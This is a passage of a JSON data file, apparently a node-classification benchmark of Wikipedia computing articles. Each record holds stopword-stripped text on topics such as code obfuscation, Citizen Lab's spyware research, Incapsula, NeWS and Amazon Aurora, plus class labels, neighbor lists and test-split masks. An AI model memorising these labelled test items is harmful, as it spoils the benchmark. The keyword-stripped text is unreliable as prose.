    "text": "Obfuscation_(software):obfuscation software software development obfuscation deliberate act creating source machine code difficult humans understand like obfuscation natural language may use needlessly roundabout expressions compose statements programmers may deliberately obfuscate code conceal purpose security obscurity logic implicit values embedded primarily order prevent tampering deter reverse engineering even puzzle recreational challenge someone reading source code done manually using automated tool latter preferred technique industry architecture characteristics languages may make easier obfuscate others c c++ perl programming language examples languages easy obfuscate writing reading obfuscated source code brain teaser number programming contests reward creatively obfuscated code international obfuscated c code contest obfuscated perl contest types obfuscations include simple keyword substitution use non-use whitespace create artistic effects self-generating heavily compressed programs according nick montfort techniques may include short obfuscated perl programs may used signatures perl programmers japhs another perl hacker winning entry international obfuscated c code contest written ian phillipps 1988 subsequently reverse engineered thomas ball c program compiled run generate 12 verses 12 days christmas contains strings required poem encoded form within code non-winning entry year next example illustrates creative use whitespace generates mazes arbitrary length ansi-compliant c compilers n't allow constant strings overwritten avoided changing *m 3 omitting m= following example óscar toledo gutiérrez best show entry 19th ioccc implements 8080 emulator complete terminal disk controller capable booting cp/m-80 running cp/m applications example japh slowly displays text another perl unix hacker multiple characters time delays explanation found python examples found official python programming faq elsewhere several advantages automated code obfuscation made popular widely useful across many platforms platforms java android .net decompiler reverse-engineer source code executable library main advantage automated code obfuscation helps protect trade secrets intellectual property contained within software making reverse-engineering program difficult economically unfeasible advantages might include helping protect licensing mechanisms unauthorized access shrinking size source code possibly shrinking size executable decompilation sometimes called man-at-the-end attack based traditional cryptographic attack known man-in-the-middle run-time interpreted languages commonly known script like older versions basic programs execute faster take less ram use single letter variable names avoid comments contain blank characters brief shorter faster obfuscation make reading writing reverse-engineering program difficult time-consuming necessarily make impossible anti-virus software avg antivirus also alert users land site code manually obfuscated one purposes obfuscation hide malicious code however developers may employ code obfuscation purpose reducing file size increasing security average user may expect antivirus software provide alerts otherwise harmless piece code especially trusted corporations feature may actually deter users using legitimate software variety tools exist perform assist code obfuscation include experimental research tools created academics hobbyist tools commercial products written professionals open-source software also exist deobfuscation tools attempt perform reverse transformation although majority commercial obfuscation solutions work transforming either program source code platform-independent bytecode used java .net also work directly compiled binaries debate whether illegal skirt copyleft software licenses releasing source code obfuscated form cases author less willing make source code available issue addressed gnu general public license requiring preferred form making modifications made available gnu website states obfuscated 'source code real source code count source code",
    "neighbors": [
      7556,
      3462,
      8582,
      4493,
      5395,
      1945,
      7851,
      300,
      2045,
      4403,
      9780,
      10420,
      10173,
      65,
      8262,
      8775,
      11081,
      10442,
      11212,
      3413,
      11351,
      7421,
      1881,
      4444,
      9052,
      3555,
      7395,
      8554,
      107,
      10097,
      3573,
      4087,
      6653,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 8172,
    "label": 4,
    "text": "Citizen_Lab:citizen lab citizen lab interdisciplinary laboratory based munk school global affairs university toronto canada founded directed professor ronald deibert citizen lab studies information controls—such network surveillance content filtering—that impact openness security internet pose threats human rights citizen lab collaborates research centres organizations individuals around world uses mixed methods approach combines computer-generated interrogation data mining analysis intensive field research qualitative social science legal policy analysis methods citizen lab founding partner opennet initiative 2002–2013 information warfare monitor 2002–2012 projects organization also developed original design psiphon censorship circumvention software spun lab private canadian corporation psiphon inc. 2008 citizen lab research outputs made global news headlines around world including front page exclusives new york times washington post globe mail tracking ghostnet 2009 researchers uncovered suspected cyber espionage network 1,295 infected hosts 103 countries high percentage high-value targets including ministries foreign affairs embassies international organizations news media ngos seminal study one first public reports reveal cyber espionage network targeted civil society government systems around world shadows cloud 2010 researchers documented complex ecosystem cyber espionage systematically compromised government business academic computer network systems india offices dalai lama united nations several countries million dollar dissident published august 2016 researchers discovered ahmed mansoor one uae five human rights defender united arab emirates targeted software developed israeli cyber war company nso group using chain zero-day exploits operators spyware attempted get mansoor click link socially engineered text message would given access everything phone prior releases report researchers contacted apple released security update patched vulnerabilities exploited spyware operators citizen lab number awards work first canadian institution win macarthur foundation ’ macarthur award creative effective institutions 2014 canadian institution receive new digital age grant 2014 google executive chairman eric schmidt past awards include electronic frontier foundation pioneer award 2015 canadian library association advancement intellectual freedom canada award 2013 canadian committee world press freedom press freedom award 2011 canadian journalists free expression ’ vox libera award 2010 according january 24 2019 ap news report citizen lab researchers targeted international undercover operatives citizen lab independent government corporate interests financial support citizen lab come ford foundation open society institute social sciences humanities research council canada international development research centre idrc canada centre global security studies university toronto ’ munk school global affairs john d. catherine t. macarthur foundation donner canadian foundation open technology fund walter duncan gordon foundation citizen lab received donations software support palantir technologies virustotal oculus info inc citizen lab ’ targeted threats research stream seeks gain better understanding technical social nature digital attacks civil society groups political context may motivate citizen lab conducts ongoing comparative analysis growing spectrum online threats including internet filtering denial-of-service attacks targeted malware targeted threats reports covered number espionage campaigns information operations tibetan community diaspora phishing attempts made journalists human rights defenders political figures international investigators anti-corruption advocates mexico prominent human rights advocate focus government surveillance united arab emirates citizen lab researchers collaborators like electronic frontier foundation also revealed several different malware campaigns targeting syrian activists opposition groups context syrian civil war many findings translated arabic disseminated along recommendations detecting removing malware citizen lab ’ research threats civil society organizations featured front page businessweek covered al jazeera forbes wired among international media outlets group reports work analyzing spyware used target opposition figures south america triggered death threats september 2015 members group received pop-up said opennet initiative tested internet filtering 74 countries found 42 them—including authoritarian democratic regimes—implement level filtering citizen lab continued research area internet censorship lab iclab project aimed developing new systems methods measuring internet censorship collaborative effort citizen lab professor phillipa gill group stony brook university department computer science professor nick feamster network operations internet security group princeton university citizen lab studies censorship surveillance implemented popular applications including social networks instant messaging search engines previous work includes investigations censorship practices search engines provided google microsoft yahoo chinese market along domestic chinese search engine baidu 2008 nart villeneuve found tom-skype chinese version skype time collected stored millions chat records publicly accessible server based china 2013 citizen lab researchers collaborated professor jedidiah crandall ph.d. student jeffrey knockel university new mexico reverse engineering tom-skype sina uc another instant messaging application used china team able obtain urls encryption keys various versions two programs downloaded keyword blacklists daily work analyzed one year half data tracking keyword lists examined social political contexts behind content lists analyzed times list updated including correlations current events current research focuses monitoring information controls popular chinese microblogging service sina weibo chinese online encyclopedias mobile messaging applications popular asia asia chats project utilizes technical investigation censorship surveillance assessment use storage user data comparison terms service privacy policies applications first report released project examined regional keyword filtering mechanisms line applies chinese users analysis popular cellphone app called smart sheriff citizen lab german group cure53 asserted app represented security hole betrayed privacy children meant protect parents south korean law required cellphones sold 18 contain software designed protect children smart sheriff popular government approved app—with 380,000 subscribers citizen lab/cure53 report described smart sheriff security holes catastrophic citizen lab conducts groundbreaking research global proliferation targeted surveillance software toolkits including finfisher hacking team nso group finfisher suite remote intrusion surveillance software developed munich-based gamma international gmbh marketed sold exclusively law enforcement intelligence agencies uk-based gamma group 2012 morgan marquis-boire bill marczak provided first public identification finfisher software citizen lab collaborators done extensive investigations finfisher including revealing use bahraini activists analyzing variants finfisher suite target mobile phone operating systems uncovering targeted spying campaigns political dissidents malaysia ethiopia documenting finfisher command control servers 36 countries citizen lab finfisher research informed inspired responses civil society organizations pakistan mexico united kingdom mexico example local activists politicians collaborated demand investigation state acquisition surveillance technologies uk led crackdown sale software worries misuse repressive regimes hacking team milan italy-based company provides intrusion surveillance software called remote control system rcs law enforcement intelligence agencies citizen lab collaborators mapped rcs network endpoints 21 countries revealed evidence rcs used target human rights activist united arab emirates moroccan citizen journalist organization independent news agency run members ethiopian diaspora following publication hacking team targeting ethiopian journalists electronic frontier foundation privacy international took legal action related allegations ethiopian government compromised computers ethiopian expatriates united states uk 2018 citizen lab released investigation global proliferation internet filtering systems manufactured canadian company netsweeper inc using combination publicly available ip scanning network measurement data technical tests identified netsweeper installations designed filter internet content operational networks 30 countries focused 10 past histories human rights challenges afghanistan bahrain india kuwait pakistan qatar somalia sudan uae yemen websites blocked countries include religious content political campaigns media websites particular interest netsweeper ‘ alternative lifestyles ’ category appears one principal purposes blocking non-pornographic lgbtq content including offered civil rights advocacy organizations hiv/aids prevention organizations lgbtq media cultural groups citizen lab called government agencies abandon act filtering lgbt content since 2016 citizen lab published number reports pegasus spyware mobile devices developed nso group israeli-based cyber intelligence firm citizen lab ten part series nso group ran 2016 2018 august 2018 report timed coordinate amnesty international in-depth report nso group 2017 group released several reports showcased phishing attempts mexico used nso group technology products used multiple attempts gain control mobile devices mexican government officials journalists lawyers human rights advocates anti-corruption workers operations used sms messages bait attempt trick targets clicking links nso group exploit infrastructure clicking links would lead remote infection target phone one case son one journalists—a minor time—was also targeted nso purports sell products governments also came group focus prominent uae human rights defender ahmed mansoor mobile phone targeted report attempts showed first time ios zero day exploits wild prompted apple release security update ios 9.3.5 affecting 1 billion apple users worldwide citizen lab research surveillance software featured front pages washington post new york times covered extensively news media around world including bbc bloomberg cbc slate salon citizen lab research commercial surveillance technologies resulted legal policy impacts december 2013 wassenaar arrangement amended include two new categories surveillance systems dual use control list— intrusion software ip network surveillance systems wassenaar arrangement seeks limit export conventional arms dual-use technologies calling signatories exchange information provide notification export activities goods munitions included control lists amendments december 2013 product intense lobbying civil society organizations politicians europe whose efforts informed citizen lab research intrusion software like finfisher surveillance systems developed marketed blue coat systems citizen lab studies commercial market censorship surveillance technologies consists range products capable content filtering well passive surveillance citizen lab developing refining methods performing internet-wide scans measure internet filtering detect externally visible installations url filtering products goal work develop simple repeatable methodologies identifying instances internet filtering installations devices used conduct censorship surveillance citizen lab conducted research companies blue coat systems netsweeper smartfilter major reports include devices wander mistake planet blue coat redux 2013 pakistan stand guard thee analysis canada-based netsweeper ’ role pakistan ’ censorship regime 2013 planet blue coat mapping global censorship surveillance tools 2013 research covered news media around world including front page washington post new york times globe mail jakarta post following 2011 publication behind blue coat investigations commercial filtering syria burma blue coat systems officially announced would longer provide support updates services software syria december 2011 u.s. department commerce bureau industry security reacted blue coat evidence imposed 2.8 million fine emirati company responsible purchasing filtering products blue coat exporting syria without license citizen lab netsweeper research cited pakistani civil society organizations bytes bolo bhi public interest litigation pakistani government formal complaints high commission embassy canada pakistan citizen lab examines transparency accountability mechanisms relevant relationship corporations state agencies regarding personal data surveillance activities research investigated use artificial intelligence canada immigration refugee systems co-authored international human rights program university toronto faculty law analysis ongoing encryption debates canadian context co-authored canadian internet policy public interest clinic close look consumer personal data requests canada summer 2017 government canada introduced new national security legislation bill c-59 national security act proposed significantly change canada national security agencies practices including canada signals intelligence agency communications security establishment since bill first proposed range civil society groups academics called significant amendments proposed act co-authored paper citizen lab canadian internet policy public interest clinic represented detailed comprehensive analysis cse-related reforms date analysis produced help members parliament journalists researchers lawyers civil society advocates engage effectively issues included parliamentary committee debates highlighted dozens media reports citizen lab active participant various global discussions internet governance internet governance forum icann united nations government group experts information telecommunications since 2010 citizen lab helped organize annual cyber dialogue conference hosted munk school global affairs ’ canada centre convenes 100 individuals countries around world work government civil society academia private enterprise effort better understand pressing issues cyberspace cyber dialogue participatory format engages attendees moderated dialogue internet security governance human rights conferences around world including high-level meeting hague-based scientific council government policy swedish government stockholm internet forum taken themes inspired discussions cyber dialogue citizen lab contributes field building supporting networks researchers advocates practitioners around world particularly global south citizen lab developed regional networks activists researchers working information controls human rights past ten years networks asia opennet asia commonwealth independent states opennet eurasia middle east north africa support international development research centre idrc citizen lab launched cyber stewards network 2012 consists south-based researchers advocates practitioners analyze impact cybersecurity policies practices local regional international level project consists 24 partners across asia sub-saharan africa latin america middle east north africa including 7iber opennet centre internet society citizen lab staff also work local partners educate train at-risk communities example 2013 collaborated tibet action institute hold public awareness events dharamshala india exiled tibetan community cyber espionage campaigns winter 2013 citizen lab conducted digital security training session russian investigative journalists sakharov center moscow citizen lab work often cited media stories relating digital security privacy controls government policy human rights technology since 2006 featured 24 front-page stories publications including new york times washington post globe mail international herald tribune since 2013 citizen lab hosted summer institute monitoring internet openness rights annual research workshop munk school global affairs university toronto brings together researchers practitioners academia civil society private sector working internet openness security rights collaborations formed clsi workshops led publication high impact reports internet filtering zambia security audit child monitoring apps south korea analysis great cannon attack tool china used large scale distributed-denial service attacks github greatfire.org according report ap news journalist raphael satter citizen lab researchers reported october israeli nso group surveillance software used spy inner circle jamal khashoggi murder targeted turn international undercover operatives citizen lab october report revealed nso signature spy software placed iphone saudi dissident omar abdulaziz one khashoggi ’ confidantes months abdulaziz said saudi arabia spies used hacking software reveal khashoggi private criticisms saudi royal family said played major role death march 2019 new york times reported citizen lab target uae contractor darkmatter",
    "neighbors": [
      10392,
      3996,
      5024,
      1317,
      4903,
      6186,
      2734,
      7096,
      3520,
      1994,
      2634,
      11211,
      3286,
      9817,
      4314,
      2661,
      3944,
      2542,
      1015
    ],
    "mask": "Test"
  },
  {
    "node_id": 8173,
    "label": 9,
    "text": "Advice_(programming):advice programming aspect functional programming advice describes class functions modify functions latter run certain function method procedure applied given join point program following taken discussion mailing list aosd-discuss pascal costanza contributed following term advice goes back term advising introduced warren teitelman phd thesis 1966 quote chapter 3 thesis advising found way bbn lisp later xerox parc interlisp also found way flavors first object-oriented extension lisp developed mit subsumed notion method combination since method combination macros closely related also interesting note first macro system described 1963 three years warren teitelman phd thesis practical use advice functions generally modify otherwise extend behavior functions easily modified extended emacspeak emacs-addon makes extensive use advice must modify thousands existing emacs modules functions produce audio output blind corresponding visual presentation would infeasible copy redefine produce audio output addition normal outputs emacspeak programmers define advice functions run another emacs example suppose one corrected misspelled word ispell one wanted re-spellcheck entire buffer codice_1 offers functionality even spellchecked word used thousand times one could track definition codice_1 copy one .emacs write additional functionality tedious prone broken-ness .emacs version get sync actual ispell elisp module even works home one wants fairly simple run another command codice_1 runs using advice functions done simply form advices part c classes late 1970s early 1980s namely functions called codice_4 codice_5 defined class called respectively member functions class however dropped c++ advices part common lisp object system clos codice_6 codice_7 codice_8 methods combined primary method standard method combination common lisp implementations provide advice functionality addition standard method combination clos extensions lispworks supports advising functions macros clos methods emacslisp added advice-related code version 19.28 1994 gregor kiczales comments follows",
    "neighbors": [
      10981,
      6502,
      7880,
      8554,
      5420,
      6061,
      5361,
      9877,
      3675
    ],
    "mask": "Test"
  },
  {
    "node_id": 8174,
    "label": 4,
    "text": "Claims-based_identity:claims-based identity claims-based identity common way applications acquire identity information need users inside organization organizations internet also provides consistent approach applications running on-premises cloud claims-based identity abstracts individual elements identity access control two parts notion claims concept issuer authority claim statement one subject person organization makes another subject example statement name group buying preference ethnicity privilege association capability subject making claim claims provider claims packaged one tokens issued issuer provider commonly known security token service sts name claims-based identity confusing first seems like misnomer attaching concept claims concept identity appears combining authentication determination identity authorization identified subject may may however closer examination reveals case claims subject subject application receiving incoming claim map is/is claims may/may rules application traditional systems often confusion differences similarities user is/is user may/may claims-based identity makes distinction clear distinction user is/is user may/may clarified possible authentication user is/is claims handled third party third party called security token service better understand concept security token service consider analogy night club doorman doorman wants prevent under-age patrons entry facilitate requests patron present driver license health insurance card identification token issued trusted third party security token service provincial state vehicle license department health department insurance company nightclub thus alleviated responsibility determining patron age trust issuing authority course make judgment authenticity token presented two steps completed nightclub successfully authenticated patron regard claim legal drinking age continuing analogy nightclub may membership system certain members may regular vip doorman might ask another token membership card might make another claim member vip case trusted issuing authority token would probably club membership card makes claim patron vip club react accordingly translating authenticated vip membership claim permission patron permitted sit exclusive lounge area served free drinks note uses term authentication include claims acquisition difference authentication limited binding user information contained user target site attribute data claim required complete authentication privacy concerns become important ability digital entities authenticate users without access personal attributes becomes increasingly important claims-based identity potential simplify authentication logic individual software applications applications n't provide mechanisms account creation password creation reset furthermore claims-based identity enables applications know certain things user without interrogate user determine facts facts claims transported envelope called secure token claims-based identity greatly simplify authentication process user n't sign multiple times multiple applications single sign creates token used authenticate multiple applications web sites addition certain facts claims packaged token user tell individual application facts repeatedly instance answering similar questions completing similar forms",
    "neighbors": [
      3521,
      4194,
      1966,
      10801,
      820,
      8159
    ],
    "mask": "Test"
  },
  {
    "node_id": 8175,
    "label": 9,
    "text": "David_Sayre:david sayre david sayre march 2 1924 – february 23 2012 american scientist credited early development direct methods protein crystallography diffraction microscopy also called coherent diffraction imaging working ibm part initial team ten programmers created fortran later suggested use electron beam lithography fabrication x-ray fresnel zone plates international union crystallography awarded sayre ewald prize 2008 unique breadth contributions crystallography range seminal contributions solving phase problem complex physics imaging generic objects x-ray diffraction microscopy ... sayre born new york city completed bachelor degree physics yale university age 19 working mit radiation laboratory earned ms degree auburn university 1948 1949 moved oxford wife anne colquhoun married 1947 sayre completed doctoral studies dorothy hodgkin group 1951 time sayre discovered equation named based concept atomicity although key direct methods still use today sayre share 1985 chemistry nobel prize awarded discovery also around time sayre inspired claude shannon recent work suggested short paper crystallographic phase problem could solved easily one could measure intensities higher density imposed bragg law insight widely seen initial spark lead recent lensless imaging techniques back united states david sayre worked structure determination carcinogen molecule lab peter friedlander university pennsylvania philadelphia structure determination program wrote ibm 701 attracted attention john backus hired part initial team programmers developed high-level programming language fortran sayre remain ibm retirement 1990 early 1970s sayre became interested x-ray microscopy suggested use newly developed electron beam lithography apparatus ibm produce fresnel zone plates type x-ray lens widely used synchrotron facilities '80s came back goal achieving lensless imaging pursued rest life",
    "neighbors": [
      10040,
      11539,
      3960,
      1976,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 8176,
    "label": 4,
    "text": "Incapsula:incapsula imperva incapsula cloud-based application delivery platform uses global content delivery network provide web application security ddos mitigation content caching application delivery load balancing failover services incapsula founded 2009 gur shatz marc gaffan company origins imperva nyse impv american-based cyber security firm owned 85 incapsula spun imperva 2009 reported growing rate 50 per quarter august 2013 company lost 1.7 million second quarter year february 2014 imperva bought remaining part incapsula became product line within parent company october 2013 incapsula credited protected one internet largest attacks website september 24 2013 attack said lasted nine hours 100gbit/s traffic peak attack btc china bitcoin yuan trading platform december 2016 incapsula reported defended largest ddos attack ever recorded peaked 650gbit/s 200mpps incapsula multiple features used security performance websites incapsula waf protects websites cross site scripting illegal resource access owasp top 10 threats sql injections web 2.0 threats including academic web archiving comment spam fake registrations malicious bots referrer spam site scraping works changing website domain name system dns record route website traffic incapsula incapsula filters malicious attacks bots website scrapers incapsula also content delivery network caches websites server network speed website load time cached information returned server closest end user order provide fast page loads also eliminates slow response central servers due heavy server traffic incapsula launched tool named backdoor protect 2013 tool reported detect block malicious backdoors webshells tool works comparing website traffic database known backdoors later year company announced login-protect two factor authentication feature integrated addition products incapsula also announced 2013 would implementing layer 7 load balancing capabilities 2011 incapsula chosen one top 10 companies participate rsa conference innovation sandbox year finalist red herring top 100 north america award 2013 incapsula named 1 best cloud based security cdn werockyourweb 2017 forrester wave ddos service providers named imperva leader top scores current offering strategy evaluated ddos service providers",
    "neighbors": [
      64,
      10368,
      4194,
      899,
      2118,
      4198,
      2409,
      4522,
      331,
      11244,
      9293,
      9855,
      9181,
      3807,
      7352,
      7899,
      2717,
      1087
    ],
    "mask": "None"
  },
  {
    "node_id": 8177,
    "label": 2,
    "text": "Edubuntu:edubuntu edubuntu previously known ubuntu education edition official derivative ubuntu operating system designed use classrooms inside schools homes communities edubuntu developed collaboration teachers technologists several countries edubuntu built top ubuntu base incorporates ltsp thin client architecture several education-specific applications aimed users aged 6 18 designed easy installation ongoing system maintenance included edubuntu linux terminal server project many applications relevant education including gcompris kde edutainment suite sabayon profile manager pessulus lockdown editor edubuntu menueditor libreoffice gnome nanny italc edubuntu cds previously available free charge shipit service available download dvd format edubuntu default gui unity gnome still available unity default gui since release 12.04 since release 7.10 kde also available edubuntu kde 2010 edubuntu qimo 4 kids project working providing qimo within edubuntu done would fitted cd primary goal edubuntu enable educator limited technical knowledge skills set computer lab on-line learning environment hour less effectively administer environment principal design goals edubuntu centralized management configuration users processes together facilities working collaboratively classroom setting equally important gathering together best available free software digital materials education according statement goals official edubuntu website aim put together system contains best free software available education make easy install maintain also aims allow low income environments maximize utilisation available older equipment first edubuntu release coincided release ubuntu 5.10 codenamed breezy badger 2005-10-13 8.04 hardy heron release edubuntu given name ubuntu education edition changed add-on standard ubuntu installation instead installable livecd version 9.10 onwards edubuntu changed available full system dvd instead add-on cd edubuntu also installable via selection edubuntu packages distributions using official ubuntu repositories ubuntu kubuntu mainly since 14.04 edubuntu become lts-only edubuntu announced skip 16.04 lts update plan staying 14.04 due lack contributors",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      10780,
      543,
      11297,
      546,
      7204,
      9253,
      551,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      1101,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      10851,
      3685,
      9320,
      9324,
      10860,
      5742,
      2671,
      3189,
      5755,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      8909,
      3791,
      6352,
      7385,
      11481,
      10971,
      5343,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9971,
      9461,
      1782,
      5369,
      6393,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8476,
      8992,
      5410,
      10530,
      6436,
      2853,
      3369,
      7980,
      6445,
      2864,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      5962,
      4951,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      2930,
      9074,
      1396,
      1406,
      11648,
      3969,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      3478,
      10646,
      926,
      9119,
      10149,
      934,
      6055,
      7082,
      1455,
      8112,
      948,
      439,
      10687,
      10694,
      4039,
      1485,
      975,
      8147,
      9689,
      2010,
      9693,
      3550,
      6625,
      7140,
      485,
      495,
      8180,
      5110,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 8178,
    "label": 9,
    "text": "IpTables_Rope:iptables rope rope programming language allows developers write extensions iptables/netfilter components linux using simple scripting language based reverse polish notation scriptable iptables match module used identify whether ip packets passed match particular set criteria rope started life project make string match module iptables stronger evolved fairly quickly open-ended scriptable packet matching mechanism",
    "neighbors": [
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 8179,
    "label": 9,
    "text": "NeWS:news news network extensible window system discontinued windowing system developed sun microsystems mid-1980s originally known sundew primary authors james gosling david s. h. rosenthal news interpreter based postscript later display postscript although two projects otherwise unrelated extending allow interaction multiple contexts support windows like postscript news could used complete programming language unlike postscript news could used make complete interactive programs mouse support gui news started implementing postscript interpreter running cooperative multitasking fashion since unlike postscript printer news would displaying number postscript programs time one screen also added complete view hierarchy based viewports known canvases synchronous event distribution system supporting events interests threads monitors like view system guis news included concept tree embedded views along events passed instance mouse click would generate event would passed object directly mouse pointer say button object respond event object button would receive message news included complete model events including timers automatic events input queues devices mice keyboards functionality required full interaction input handling system designed provide strong event synchronization guarantees possible asynchronous protocols like x support user interface widgets news expanded original postscript stack-based language complete object oriented oo programming style inheritance eliminated need external oo language build complete application since additions implemented extensions postscript possible write simple postscript code would result running onscreen interactive program two popular demonstration programs onscreen clock required two pages code program drew pair eyes followed cursor moved around screen eyeball program shown siggraph 1988 inspiration later well-known x application xeyes news included several libraries user interface elements widgets written news widgets ran behaviour news interpreter required communications outside program news code widget demanded example toggle button display routine query button state pressed change display accordingly button postscript code also react mouse clicks changing state pressed pressed vice versa happen windowing server without interaction client program mouse released button event sent handling sophisticated x window system server model report mouse pushed mouse mouse released events client figure event button switch state finally instruct server display new state client server machine interactions must travel network results delay responding news architecturally similar called ajax except news coherently best example library tnt news toolkit sun released 1989 sun also shipped earlier lite toolkit intended example purposes making small programs although adoption never widespread several companies licensed news adapted various uses open look version framemaker desktop publishing program developed frame technology corp. funding mainly sun microsystems nsa one commercial products ran news hyperlook developed arthur van hoff turing institute interactive application design system hopkins developed news version simcity built hyperlook commercial drawing program altsys virtuoso produced news port freehand additional functionality took advantage postscript environment unfortunately sun announced end support news virtuoso became ready ship compared x news vastly powerful also slower especially local connections c api low level difficult use news programs tended entirely written postscript another factor popularity sun charged fee license news source code mit x11 code free cost first versions news emulated x10 protocol translating calls news postscript speed problems plus existence programs relied exact pixel results x10 calls obsolescence x10 forced sun release x11/news hybrid called xnews ran x11 server parallel postscript interpreter seriously degraded news interpreter performance considered good x11 server either sun also implemented open look user interface specification several toolkits news toolkit tnt open look toolkit written postscript ran news server olit built xt x intrinsics base motif xview used apis sun earlier sunview window system clear open look lost motif popularity adobe acquired framemaker sun stopped supporting news products news simply vanished",
    "neighbors": [
      3328,
      9731,
      3462,
      1801,
      1802,
      4235,
      3597,
      1809,
      2710,
      9343,
      7072,
      8994,
      1316,
      10789,
      1707,
      5677,
      3247,
      7983,
      6322,
      8628,
      2871,
      7104,
      9665,
      6338,
      10051,
      10436,
      8007,
      1480,
      2895,
      597,
      3285,
      10327,
      10200,
      8923,
      479,
      4960,
      5471,
      5855,
      9955,
      11363,
      11626,
      7148,
      7022,
      5872,
      5233,
      9714,
      9333,
      631,
      11129,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 8180,
    "label": 2,
    "text": "YOPER:yoper yoper linux—your operating system—was linux distribution pcs i686 pentium pro higher processor types intended use personal computers server used hardware recognition tools known knoppix defining feature distribution set custom optimisations intended make fastest out-of-the-box distribution project founded andreas girardet later maintained tobias gerschner distribution scratch-built opposed modifying one popular distributions create new distribution yoper discontinued operationally dismantled december 31 2012",
    "neighbors": [
      5380,
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      823,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      1776,
      6129,
      7920,
      5363,
      8177,
      9074,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "None"
  },
  {
    "node_id": 8181,
    "label": 1,
    "text": "Amazon_Aurora:amazon aurora amazon aurora relational database service developed offered amazon web services beginning october 2014 aurora available part amazon relational database service rds aurora offered mysql compatible service upon release added postgresql compatibility october 2017 became possible stop start aurora clusters september 2018 august 2018 amazon began offer serverless version 2019 developers aurora sigmod systems award fundamentally redesigning relational database storage cloud environments aurora automatically allocates database storage space 10-gigabyte increments needed maximum 64 terabytes aurora offers automatic six-way replication chunks across multiple locations improved availability fault-tolerance aurora provides users performance metrics query throughput latency provides fast database cloning amazon designed aurora compatible mysql meaning tools querying managing mysql databases command-line client mysql workbench graphical user-interface used mysql options features available amazon aurora compatible mysql 5.6 5.7 supports innodb storage engine amazon claims fivefold performance improvements benchmarking tests mysql hardware due tightly integrating database engine ssd-based virtualized storage layer purpose-built database workloads reducing writes storage system minimizing lock contention eliminating delays created database process threads independent tests shown aurora performs better competing technologies combinations workload instance type",
    "neighbors": [
      11392,
      8962,
      8451,
      6027,
      5660,
      11038,
      11556,
      2217,
      7983,
      9010,
      10681,
      11201,
      9286,
      5960,
      10185,
      590,
      7248,
      2901,
      3927,
      7512,
      8921,
      8539,
      735,
      1001,
      5612,
      7022,
      7537,
      2810
    ],
    "mask": "Test"
  },
  {
    "node_id": 8182,
    "label": 7,
    "text": "Fabasoft:fabasoft fabasoft ag software manufacturer headquartered linz upper austria company established 1988 helmut fallmann leopold bauernfeind name fabasoft acronym fallmann bauernfeind software fiscal year fabasoft ag commences april 1 number employees respective reporting date march 31 increased recent years 100 staff 2003 185 2004 203 2005 corporate revenue also increased eur 16.94 million 2003/2004 fiscal year eur 21.85 million 2004/2005 eur 25.3 million 2005/2006 fiscal year 2006/2007 fiscal year revenue decreased eur 21.2 million eur 21.6 million recorded 2007/2008 fiscal year 2008/2009 fabasoft ag recorded revenue eur 20.02 million fiscal year 2009/2010 sales revenue eur 23.3 million fabasoft ag stocks listed prime standard frankfurt stock exchange since october 4 1999 fabasoft certified according iso 9001 iso 20000 iso 27001 type ii",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8183,
    "label": 8,
    "text": "UCoz:ucoz ucoz free web hosting built-in content management system modules ucoz cms used together build fully featured website separately e.g online shopping platform blog webforum etc july 10 2015 one half million websites created ucoz system ucoz among top sites russian-speaking users according alexa internet initially basis service development formed combined experience several developers consisted previous work different services polls free guestbooks importantly professional cms script wocatalog pro 29 october 2005 almost year development ucoz announced russian version system june 2007 english version system officially announced august — german version currently ucoz also available azeri spanish french arabic hungarian romanian swedish polish portuguese partially hebrew latvian ukrainian georgian languages january 2013 yandex 4th largest search engine world announced transfer ucoz project narod 2nd largest free website hosting platform russian internet merger increased ucoz market share substantially company already market leader merger ucoz backed mail.ru group headquarters moscow russia offices sankt petersburg rostov kazan cherkassy ukraine saas system ucoz features type platform like closed source code availability running server-side scripts like javascript also unavailability running databases possible within web 3.0 paas concept balanced great number built-in system capabilities also system fully html5 css3 compatible",
    "neighbors": [
      10020,
      3462,
      735
    ],
    "mask": "None"
  },
  {
    "node_id": 8184,
    "label": 3,
